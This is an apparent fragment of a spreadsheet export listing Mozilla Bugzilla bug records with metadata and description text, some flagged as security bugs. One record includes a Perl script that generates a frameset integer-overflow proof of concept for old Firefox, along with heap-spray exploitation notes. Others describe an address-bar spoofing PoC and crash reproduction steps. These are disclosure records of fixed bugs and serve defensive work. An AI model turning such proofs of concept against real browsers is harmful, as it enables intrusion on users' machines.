      <c r="R4608" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4608" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4608" t="n">
        <v>1</v>
      </c>
      <c r="U4608" t="n">
        <v>0</v>
      </c>
      <c r="V4608" t="n">
        <v>17</v>
      </c>
      <c r="W4608" t="inlineStr">
        <is>
          <t>Created attachment 9215018
firefox-android-poc.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Steps to reproduce:
STEP 1: Click on "run" in attached file ("firefox-desktop-PoC.html")
The address bar will point to "www.mozilla.org", however the actual content is being delivered by "اختبار.اختبار"
The URL is not handled properly. Arabic characters in the domain name are being rendered from Right to Left(RTL) direction rather than Left to Right(LTR).
Actual results:
http://www.mozilla.org/hello/1/index.html/رابتخا.رابتخا
Expected results:
http://اختبار.اختبار/www.mozilla.org/hello/1/index.html
The address bar should point to "اختبار.اختبار" instead of "www.mozilla.org"</t>
        </is>
      </c>
      <c r="X4608" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4609">
      <c r="A4609" t="n">
        <v>627295</v>
      </c>
      <c r="B4609" t="inlineStr">
        <is>
          <t>2011-01-19 23:15:38 -0800</t>
        </is>
      </c>
      <c r="C4609" t="inlineStr">
        <is>
          <t>UMR [@ nsSVGGlyphFrame::PaintSVG] [@ _cairo_gstate_stroke]</t>
        </is>
      </c>
      <c r="D4609" t="inlineStr">
        <is>
          <t>2015-02-25 21:54:02 -0800</t>
        </is>
      </c>
      <c r="E4609" t="n">
        <v>1</v>
      </c>
      <c r="F4609" t="n">
        <v>1</v>
      </c>
      <c r="G4609" t="n">
        <v>3</v>
      </c>
      <c r="H4609" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4609" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4609" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4609" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4609" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4609" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4609" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4609" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q4609" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4609" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4609" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4609" t="n">
        <v>1</v>
      </c>
      <c r="U4609" t="n">
        <v>0</v>
      </c>
      <c r="V4609" t="n">
        <v>6</v>
      </c>
      <c r="W4609" t="inlineStr">
        <is>
          <t>Created attachment 505353
valgrind complaint
gfx/tests/crashtests/385228-1.svg triggers a UMR (use of uninitialized memory).
Uninitialized memory caused by the stack allocation of nsSVGGlyphFrame::PaintSVG is used in _cairo_gstate_stroke.</t>
        </is>
      </c>
      <c r="X4609" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4610">
      <c r="A4610" t="n">
        <v>1539595</v>
      </c>
      <c r="B4610" t="inlineStr">
        <is>
          <t>2019-03-27 12:01:51 -0700</t>
        </is>
      </c>
      <c r="C4610" t="inlineStr">
        <is>
          <t>Consider an origin-whitelist for early site isolation for AMO and accounts.firefox.com</t>
        </is>
      </c>
      <c r="D4610" t="inlineStr">
        <is>
          <t>2024-08-28 08:52:00 -0700</t>
        </is>
      </c>
      <c r="E4610" t="n">
        <v>1</v>
      </c>
      <c r="F4610" t="n">
        <v>1</v>
      </c>
      <c r="G4610" t="n">
        <v>3</v>
      </c>
      <c r="H4610" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4610" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4610" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K4610" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4610" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4610" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4610" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4610" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4610" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main69+]</t>
        </is>
      </c>
      <c r="Q4610" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4610" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T4610" t="n">
        <v>1</v>
      </c>
      <c r="U4610" t="n">
        <v>0</v>
      </c>
      <c r="V4610" t="n">
        <v>36</v>
      </c>
      <c r="W4610" t="inlineStr">
        <is>
          <t>These were factors in the sandbox escapes seen at pwn2own -- if UXSSing to them was impossible, that'd be great.
This might be tractable since I don't think iframes need to work for either of them.</t>
        </is>
      </c>
      <c r="X4610" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4611">
      <c r="A4611" t="n">
        <v>623998</v>
      </c>
      <c r="B4611" t="inlineStr">
        <is>
          <t>2011-01-07 12:49:32 -0800</t>
        </is>
      </c>
      <c r="C4611" t="inlineStr">
        <is>
          <t>Integer overflow in frameset spec (not bug 576447) w/gcc compiler</t>
        </is>
      </c>
      <c r="D4611" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:05 -0700</t>
        </is>
      </c>
      <c r="E4611" t="n">
        <v>1</v>
      </c>
      <c r="F4611" t="n">
        <v>1</v>
      </c>
      <c r="G4611" t="n">
        <v>3</v>
      </c>
      <c r="H4611" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4611" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4611" t="inlineStr">
        <is>
          <t>Layout: Images, Video, and HTML Frames</t>
        </is>
      </c>
      <c r="K4611" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4611" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4611" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4611" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4611" t="inlineStr">
        <is>
          <t>[sg:critical?][softblocker]</t>
        </is>
      </c>
      <c r="Q4611" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4611" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4611" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4611" t="n">
        <v>1</v>
      </c>
      <c r="U4611" t="n">
        <v>0</v>
      </c>
      <c r="V4611" t="n">
        <v>35</v>
      </c>
      <c r="W4611" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Build Identifier: 3.6.13
When creating a frameset element both a rows and cols spec are parsed by nsHTMLFrameSetElement::ParseRowCol, which limits their sizes to 100'000 elements.
If a frameset spec is created where the product of the rows and cols sizes is &gt;= 2^32 we overflow the PRInt32 numCells:
layout/generic/nsFrameSetFrame.cpp
    352   PRInt32 numCells = mNumRows*mNumCols;
    369   mChildFrameborder  = new nsFrameborder[numCells];
With carefully crafted values for the rows and cols spec this can lead to arbitrary code execution on some platforms.
Perl script to generate POC:
****************************
#!/usr/bin/env perl
$spec1 = "*," x 61750;
$spec1 = $spec1 . "*";
$spec2 = "*," x 69552;
$spec2 = $spec2 . "*";
print "&lt;html&gt;";
print "&lt;frameset rows='$spec1' cols='$spec2'&gt;
&lt;frame src='example1.com'&gt;
&lt;frame src='example2.com'&gt;
&lt;frame src='example3.com'&gt;
&lt;frame src='example4.com'&gt;
&lt;frame src='example5.com'&gt;
&lt;frame src='example6.com'&gt;
&lt;frame src='example7.com'&gt;
&lt;/frameset&gt;
&lt;/html&gt;";
****************************
This POC crashes reliably on my 32 bit linux box with the following stack trace:
Program received signal SIGSEGV, Segmentation fault.
nsHTMLFramesetFrame::GetNoResize (this=0xa7edd6b0, aChildFrame=0x0) at nsFrameSetFrame.cpp:1359
1359	  nsIContent* content = aChildFrame-&gt;GetContent();
(gdb) bt
#0  nsHTMLFramesetFrame::GetNoResize (this=0xa7edd6b0, aChildFrame=0x0) at nsFrameSetFrame.cpp:1359
#1  0xb74956a6 in nsHTMLFramesetFrame::CanChildResize (this=0xa7edd6b0, aVertical=1, aLeft=0, aChildX=69553, aFrameset=0)
    at nsFrameSetFrame.cpp:1375
#2  0xb74957d1 in nsHTMLFramesetFrame::SetBorderResize (this=0xa7edd6b0, aChildTypes=0xa7ceef20, aBorderFrame=0xa7eddcc8)
    at nsFrameSetFrame.cpp:1452
#3  0xb74970ef in nsHTMLFramesetFrame::Reflow (this=0xa7edd6b0, aPresContext=0xa9c96c00, aDesiredSize=..., 
    aReflowState=..., aStatus=@0xbfffddf4) at nsFrameSetFrame.cpp:1258
#4  0xb74809ed in nsBlockReflowContext::ReflowBlock (this=0xbfffdd00, aSpace=&lt;value optimised out&gt;, aApplyTopMargin=1, 
    aPrevMargin=..., aClearance=0, aIsAdjacentWithTop=1, aLine=0xa7eddaf8, aFrameRS=..., aFrameReflowStatus=@0xbfffddf4, 
    aState=...) at nsBlockReflowContext.cpp:310
#5  0xb747cdbd in nsBlockFrame::ReflowBlockFrame (this=0xa7edd300, aState=..., aLine=..., aKeepReflowGoing=0xbfffdf7c)
    at nsBlockFrame.cpp:3141
#6  0xb747efe0 in nsBlockFrame::ReflowLine (this=0xa7edd300, aState=..., aLine=..., aKeepReflowGoing=0xbfffdf7c)
    at nsBlockFrame.cpp:2408
#7  0xb747f4d4 in nsBlockFrame::ReflowDirtyLines (this=0xa7edd300, aState=...) at nsBlockFrame.cpp:1921
#8  0xb747fe68 in nsBlockFrame::Reflow (this=0xa7edd300, aPresContext=0xa9c96c00, aMetrics=..., aReflowState=..., 
    aStatus=@0xbfffe708) at nsBlockFrame.cpp:991
#9  0xb7486bcc in nsContainerFrame::ReflowChild (this=0xa7edd258, aKidFrame=0xa7edd300, aPresContext=0xa9c96c00, 
    aDesiredSize=..., aReflowState=..., aX=0, aY=0, aFlags=&lt;value optimised out&gt;, aStatus=@0xbfffe708, aTracker=0x0)
    at nsContainerFrame.cpp:800
#10 0xb749f05a in CanvasFrame::Reflow (this=0xa7edd258, aPresContext=0xa9c96c00, aDesiredSize=..., aReflowState=..., 
    aStatus=@0xbfffe708) at nsHTMLFrame.cpp:549
#11 0xb7486bcc in nsContainerFrame::ReflowChild (this=0xa9196bc8, aKidFrame=0xa7edd258, aPresContext=0xa9c96c00, 
    aDesiredSize=..., aReflowState=..., aX=0, aY=0, aFlags=&lt;value optimised out&gt;, aStatus=@0xbfffe708, aTracker=0x0)
    at nsContainerFrame.cpp:800
#12 0xb74cf130 in ViewportFrame::Reflow (this=0xa9196bc8, aPresContext=0xa9c96c00, aDesiredSize=..., aReflowState=..., 
    aStatus=@0xbfffe708) at nsViewportFrame.cpp:284
#13 0xb74678ea in PresShell::DoReflow (this=0xa8553460, target=0xa9196bc8, aInterruptible=1) at nsPresShell.cpp:7296
#14 0xb746c146 in PresShell::ProcessReflowCommands (this=0xa8553460, aInterruptible=1) at nsPresShell.cpp:7432
#15 0xb746d8f8 in PresShell::FlushPendingNotifications (this=0xa8553460, aType=Flush_InterruptibleLayout)
    at nsPresShell.cpp:4910
#16 0xb74670c0 in PresShell::ReflowEvent::Run (this=0xa7bf4e90) at nsPresShell.cpp:7106
#17 0xb7c16b50 in nsThread::ProcessNextEvent (this=0xb5ba1330, mayWait=0, result=0xbfffe85c) at nsThread.cpp:527
#18 0xb7be53a3 in NS_ProcessNextEvent_P (thread=0x0, mayWait=0) at nsThreadUtils.cpp:250
#19 0xb7b5ab31 in mozilla::ipc::MessagePump::Run (this=0xb5bcb910, aDelegate=0xb5b3a7c0) at MessagePump.cpp:110
#20 0xb7bb3732 in MessageLoop::RunInternal (this=0xb5b3a7c0) at ./src/base/message_loop.cc:216
#21 0xb7bb3756 in MessageLoop::RunHandler (this=0xb5b3a7c0) at ./src/base/message_loop.cc:199
#22 0xb7bb37cd in MessageLoop::Run (this=0xb5b3a7c0) at ./src/base/message_loop.cc:173
#23 0xb7ab3c44 in nsBaseAppShell::Run (this=0xb5393150) at nsBaseAppShell.cpp:174
#24 0xb7975108 in nsAppStartup::Run (this=0xb312b310) at nsAppStartup.cpp:183
#25 0xb72ada0e in XRE_main (argc=1, argv=0xbfffefc4, aAppData=0xb5b18380) at nsAppRunner.cpp:3483
#26 0x001119e3 in main (argc=1, argv=0xbfffefc4) at nsBrowserApp.cpp:158
Analysis:
The POC creates a frameset with 61751 rows and 69553 cols, which overflows to allocate memory for 7 frames.
nsHTMLFramesetFrame::Init uses this 7 value throughout and I can't find any opportunity for a heap overflow there, but nsHTMLFramesetFrame::SetBorderResize uses the mNumRows and mNumCols values to iterate through the cells.
(PRInt32 childX = aBorderFrame-&gt;mPrevNeighbor + (rowX * mNumCols);)
It passes the computed index to nsHTMLFramesetFrame::CanChildResize, which calls nsFrameList::FrameAt(PRInt32 aIndex) with the out of bounds index:
    276 nsFrameList::FrameAt(PRInt32 aIndex) const
    277 {
    278   NS_PRECONDITION(aIndex &gt;= 0, "invalid arg");
    279   if (aIndex &lt; 0) return nsnull;
    280   nsIFrame* frame = mFirstChild;
    281   while ((aIndex-- &gt; 0) &amp;&amp; frame) {
    282     frame = frame-&gt;GetNextSibling();
    283   }
    284   return frame;
This will walk off the end of the list and return NULL.
This is then passed to nsHTMLFramesetFrame::GetNoResize without checking for NULL. GetNoResize also performs no NULL check on the pointer it is passed before executing:
   1359   nsIContent* content = aChildFrame-&gt;GetContent();
(where aChildFrame is a NULL pointer)
If you can map the null page (eg: an older version of linux, not sure about other systems) you could heap spray hoping to control memory just above 0x00000000 to gain control of execution flow.
There may be a more elegant heap overflow possible using the integer overflow but I haven't found one.
The fix would be to limit the size of frameset specs to something way below 100'000, and a null check on the return value of nsFrameList::FrameAt.
Reproducible: Always
Steps to Reproduce:
1. Run perl script to generate html file
2. Open in browser
Actual Results:  
Crash
Expected Results:  
Not crash</t>
        </is>
      </c>
      <c r="X4611" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4612">
      <c r="A4612" t="n">
        <v>1383121</v>
      </c>
      <c r="B4612" t="inlineStr">
        <is>
          <t>2017-07-21 09:38:03 -0700</t>
        </is>
      </c>
      <c r="C4612" t="inlineStr">
        <is>
          <t>mark the release as shipped builder fails in 55.0b{11,12} with 401</t>
        </is>
      </c>
      <c r="D4612" t="inlineStr">
        <is>
          <t>2018-02-28 10:32:49 -0800</t>
        </is>
      </c>
      <c r="E4612" t="n">
        <v>1</v>
      </c>
      <c r="F4612" t="n">
        <v>1</v>
      </c>
      <c r="G4612" t="n">
        <v>5</v>
      </c>
      <c r="H4612" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4612" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4612" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4612" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4612" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4612" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q4612" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4612" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4612" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4612" t="n">
        <v>1</v>
      </c>
      <c r="U4612" t="n">
        <v>0</v>
      </c>
      <c r="V4612" t="n">
        <v>19</v>
      </c>
      <c r="W4612" t="inlineStr">
        <is>
          <t>Most likely fallback from secrets rotation:
08:59:06     INFO - [mozharness: 2017-07-21 15:59:06.724079Z] Finished mark-as-shipped step (failed)
08:59:06    FATAL - Uncaught exception: Traceback (most recent call last):
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/scripts/mozharness/base/script.py", line 2068, in run
08:59:06    FATAL -     self.run_action(action)
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/scripts/mozharness/base/script.py", line 2007, in run_action
08:59:06    FATAL -     self._possibly_run_method(method_name, error_if_missing=True)
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/scripts/mozharness/base/script.py", line 1947, in _possibly_run_method
08:59:06    FATAL -     return getattr(self, method_name)()
08:59:06    FATAL -   File "scripts/scripts/release/postrelease_mark_as_shipped.py", line 106, in mark_as_shipped
08:59:06    FATAL -     status='shipped', shippedAt=shipped_at)
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/build/venv/lib/python2.7/site-packages/shipitapi/shipitapi.py", line 110, in update
08:59:06    FATAL -     url_template_vars=url_template_vars).content
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/build/venv/lib/python2.7/site-packages/shipitapi/shipitapi.py", line 61, in request
08:59:06    FATAL -     res.raise_for_status()
08:59:06    FATAL -   File "/builds/slave/rel-m-beta-fx_mark_as_shipped-/build/venv/lib/python2.7/site-packages/requests/models.py", line 909, in raise_for_status
08:59:06    FATAL -     raise HTTPError(http_error_msg, response=self)
08:59:06    FATAL - HTTPError: 401 Client Error: Authorization Required for url: https://ship-it.mozilla.org/csrf_token
08:59:06    FATAL - Running post_fatal callback...
08:59:06    FATAL - Exiting -1
08:59:06     INFO - Running post-run listener: copy_logs_to_upload_dir
08:59:06     INFO - Copying logs to upload dir...
08:59:06     INFO - mkdir: /builds/slave/rel-m-beta-fx_mark_as_shipped-/build/upload/logs
Firefox - https://tools.taskcluster.net/groups/PKW6AX1_Ty6Aw4tcB_CV6A/tasks/R2A-ZhE1QhurJvab3xp_Gw/runs/4/logs/public%2Flogs%2Flive_backing.log.gz
DevEdition - https://tools.taskcluster.net/groups/9wkcaGyMTCC9UomQmsuyCQ/tasks/a0gLwmguQm2r6nC_-l2_bA/runs/5/logs/public%2Flogs%2Flive_backing.log.gz</t>
        </is>
      </c>
      <c r="X4612" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4613">
      <c r="A4613" t="n">
        <v>1169414</v>
      </c>
      <c r="B4613" t="inlineStr">
        <is>
          <t>2015-05-28 13:34:31 -0700</t>
        </is>
      </c>
      <c r="C4613" t="inlineStr">
        <is>
          <t>Traffic Disconnect</t>
        </is>
      </c>
      <c r="D4613" t="inlineStr">
        <is>
          <t>2015-07-14 11:55:25 -0700</t>
        </is>
      </c>
      <c r="E4613" t="n">
        <v>1</v>
      </c>
      <c r="F4613" t="n">
        <v>1</v>
      </c>
      <c r="G4613" t="n">
        <v>6</v>
      </c>
      <c r="H4613" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4613" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J4613" t="inlineStr">
        <is>
          <t>Traffic</t>
        </is>
      </c>
      <c r="K4613" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4613" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4613" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4613" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4613" t="inlineStr">
        <is>
          <t>.?</t>
        </is>
      </c>
      <c r="Q4613" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4613" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4613" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4613" t="n">
        <v>1</v>
      </c>
      <c r="U4613" t="n">
        <v>0</v>
      </c>
      <c r="V4613" t="n">
        <v>5</v>
      </c>
      <c r="W4613" t="inlineStr">
        <is>
          <t>Created attachment 8612514
disconnect_creative_en-US_052815.zip
Ed:
Data Distro has been updated (Disconnect1EN). 
Please traffic Disconnect.me tiles to the following:
Client Name: Disconnect.me
Campaign Run: June 1 - Nov 31
Creative: Attached
Tile Title: Get Disconnect
Language - EN only for now
URLs:
1	AR https://disconnect.me/firefox/AR_en
2	AT https://disconnect.me/firefox/AT_en
3	AU https://disconnect.me/firefox/AU_en
4	BE https://disconnect.me/firefox/BE_en
5	CA https://disconnect.me/firefox/CA_en
6	CH https://disconnect.me/firefox/CH_en
7	CL https://disconnect.me/firefox/CL_en
8	CO https://disconnect.me/firefox/CO_en
9	DE https://disconnect.me/firefox/DE_en
10	EG https://disconnect.me/firefox/EG_en
11	ES https://disconnect.me/firefox/ES_en
12	FR https://disconnect.me/firefox/FR_en
13	GB https://disconnect.me/firefox/GB_en
14	HK https://disconnect.me/firefox/HK_en
15	HU https://disconnect.me/firefox/HU_en
16	IN https://disconnect.me/firefox/IN_en
17	ID https://disconnect.me/firefox/ID_en
18	IT https://disconnect.me/firefox/IT_en
19	JO https://disconnect.me/firefox/JO_en
20	KZ https://disconnect.me/firefox/KZ_en
21	MX https://disconnect.me/firefox/MX_en
22	NL https://disconnect.me/firefox/NL_en
23	NZ https://disconnect.me/firefox/NZ_en
24	PK https://disconnect.me/firefox/PK_en
25	PE https://disconnect.me/firefox/PE_en
26	PH https://disconnect.me/firefox/PH_en
27	PL https://disconnect.me/firefox/PL_en
28	PT https://disconnect.me/firefox/PT_en
29	RO https://disconnect.me/firefox/RO_en
30	RU https://disconnect.me/firefox/RU_en
31	SA https://disconnect.me/firefox/SA_en
32	TW https://disconnect.me/firefox/TW_en
33	TR https://disconnect.me/firefox/TR_en
34	US https://disconnect.me/firefox/US_en
35	VE https://disconnect.me/firefox/VE_en
36	VT https://disconnect.me/firefox/VT_en</t>
        </is>
      </c>
      <c r="X4613" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4614">
      <c r="A4614" t="n">
        <v>1826791</v>
      </c>
      <c r="B4614" t="inlineStr">
        <is>
          <t>2023-04-06 07:50:39 -0700</t>
        </is>
      </c>
      <c r="C4614" t="inlineStr">
        <is>
          <t>Access violation on BuildTextRunsScanner::ScanFrame at layout/generic/nsTextFrame.cpp</t>
        </is>
      </c>
      <c r="D4614" t="inlineStr">
        <is>
          <t>2024-05-30 11:08:01 -0700</t>
        </is>
      </c>
      <c r="E4614" t="n">
        <v>1</v>
      </c>
      <c r="F4614" t="n">
        <v>1</v>
      </c>
      <c r="G4614" t="n">
        <v>3</v>
      </c>
      <c r="H4614" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4614" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4614" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K4614" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4614" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4614" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4614" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4614" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q4614" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4614" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4614" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T4614" t="n">
        <v>1</v>
      </c>
      <c r="U4614" t="n">
        <v>0</v>
      </c>
      <c r="V4614" t="n">
        <v>33</v>
      </c>
      <c r="W4614" t="inlineStr">
        <is>
          <t>Created attachment 9327382
testcase-setrangetext1.html
After run setRangeText on textarea with long string, then run window.scrollByPages and new worker repeatedly on queueMicroTask, Firefox tab able to crash on BuildTextRunsScanner::ScanFrame(nsIFrame*) at layout/generic/nsTextFrame.cpp, the crash address able to change e.g. 0xeb4ff006, 0x73982014, 0x73997014, 0x9fbff006, and more.
## Tested on:
- Firefox Nightly 113.0a1 (2023-04-06) (32-bit)
- Firefox 111.0.1 (32-bit)
- Firefox ESR 102.9.0esr (32-bit)
## Steps to reproduce:
1. Open Firefox 32-bit
2. Visit attached testcase-setrangetext1.html
3. Analyze the crash dump
If Firefox crash at EXCEPTION_BREAKPOINT, try again until it crash at ACCESS_VIOLATION_READ</t>
        </is>
      </c>
      <c r="X4614" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4615">
      <c r="A4615" t="n">
        <v>1172397</v>
      </c>
      <c r="B4615" t="inlineStr">
        <is>
          <t>2015-06-07 21:58:28 -0700</t>
        </is>
      </c>
      <c r="C4615" t="inlineStr">
        <is>
          <t>Replaying a HTMLMediaElement streamed over a PeerConnection can crash WebRTC</t>
        </is>
      </c>
      <c r="D4615" t="inlineStr">
        <is>
          <t>2016-07-02 10:49:32 -0700</t>
        </is>
      </c>
      <c r="E4615" t="n">
        <v>1</v>
      </c>
      <c r="F4615" t="n">
        <v>1</v>
      </c>
      <c r="G4615" t="n">
        <v>3</v>
      </c>
      <c r="H4615" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4615" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4615" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K4615" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L4615" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4615" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4615" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4615" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q4615" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4615" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4615" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4615" t="n">
        <v>1</v>
      </c>
      <c r="U4615" t="n">
        <v>0</v>
      </c>
      <c r="V4615" t="n">
        <v>29</v>
      </c>
      <c r="W4615" t="inlineStr">
        <is>
          <t>From bug 1171907:
When I try to play() a captured media element streaming over a PeerConnection that has ended (stream has not ended), we crash here:
&gt;   * frame #0: 0x0000000101f58a1d XUL`mozilla::WebrtcAudioConduit::ValidateCodecConfig(mozilla::AudioCodecConfig const*, bool) const [inlined] std::string::size() const + 4 at basic_string.h:606
&gt;     frame #1: 0x0000000101f58a19 XUL`mozilla::WebrtcAudioConduit::ValidateCodecConfig(mozilla::AudioCodecConfig const*, bool) const [inlined] std::string::empty() const at basic_string.h:686
&gt;     frame #2: 0x0000000101f58a19 XUL`mozilla::WebrtcAudioConduit::ValidateCodecConfig(this=0x000000012b9fa330, codecInfo=0x000000012c684000, send=true) const + 25 at AudioConduit.cpp:1031
&gt;     frame #3: 0x0000000101f58595 XUL`mozilla::WebrtcAudioConduit::ConfigureSendMediaCodec(this=0x000000012b9fa330, codecConfig=0x000000012c684000) + 101 at AudioConduit.cpp:364
&gt;     frame #4: 0x0000000101f6d6f3 XUL`mozilla::MediaPipelineTransmit::PipelineListener::ProcessVideoChunk(this=&lt;unavailable&gt;, conduit=&lt;unavailable&gt;, chunk=&lt;unavailable&gt;) + 3107 at MediaPipeline.cpp:1229
&gt;     frame #5: 0x0000000101f6bc4d XUL`mozilla::MediaPipelineTransmit::PipelineListener::NewData(this=0x0000000126733f20, graph=&lt;unavailable&gt;, tid=&lt;unavailable&gt;, offset=&lt;unavailable&gt;, events=&lt;unavailable&gt;, media=0x000000011eecb460) + 989 at MediaPipeline.cpp:958
&gt;     frame #6: 0x0000000101f6c028 XUL`mozilla::MediaPipelineTransmit::PipelineListener::NotifyQueuedTrackChanges(this=&lt;unavailable&gt;, graph=&lt;unavailable&gt;, tid=&lt;unavailable&gt;, offset=&lt;unavailable&gt;, events=&lt;unavailable&gt;, queued_media=&lt;unavailable&gt;) + 808 at MediaPipeline.cpp:894
